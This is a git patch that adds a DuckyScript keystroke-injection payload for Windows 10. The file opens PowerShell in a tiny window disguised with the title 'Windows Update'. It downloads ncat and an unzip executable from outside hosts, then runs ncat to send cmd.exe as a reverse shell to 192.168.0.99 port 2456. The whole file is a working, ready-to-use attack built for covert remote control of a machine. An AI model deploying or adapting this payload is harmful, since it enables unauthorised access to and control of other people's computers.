From e4edf94ee52582b867d359a87f464aa7eb0c0d11 Mon Sep 17 00:00:00 2001
From: Aleksandr Sobolev <alm_sobolev@g.betboom.org>
Date: Thu, 22 Aug 2024 10:08:38 +0300
Subject: [PATCH] initial

---
 WIN10-NC-Rev-Shell.txt | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 WIN10-NC-Rev-Shell.txt

diff --git a/WIN10-NC-Rev-Shell.txt b/WIN10-NC-Rev-Shell.txt
new file mode 100644
index 0000000..e8b4415
--- /dev/null
+++ b/WIN10-NC-Rev-Shell.txt
@@ -0,0 +1,30 @@
+GUI R
+DELAY 2000
+STRING PowerShell.exe -noe -c "mode.com con: lines=1 cols=12"
+ENTER
+DELAY 2000
+STRING $Host.UI.RawUI.WindowTitle = "Windows Update"
+DELAY 2000
+ENTER
+DELAY 2000
+STRING mkdir C:\Users\Public\Documents\she
+ENTER
+DELAY 2000
+STRING Invoke-WebRequest -Uri https://nmap.org/dist/nmap-7.80-win32.zip -Outfile C:\Users\Public\Documents\she\nc.zip
+ENTER
+DELAY 2000
+STRING Invoke-WebRequest -Uri http://pwnpalace.com/download/others/fce642c6-1963-4a0d-bffe-173f43f02329.zip -Outfile C:\Users\Public\Documents\she\unzip.exe
+ENTER
+DELAY 2000
+STRING cd C:\Users\Public\Documents\she
+ENTER
+DELAY 2000
+STRING .\unzip.exe nc.zip
+ENTER
+DELAY 3000
+STRING cd nmap-7.80
+ENTER
+DELAY 2000
+STRING .\ncat.exe 192.168.0.99 2456 -e cmd.exe
+ENTER
+WINDOWS DOWN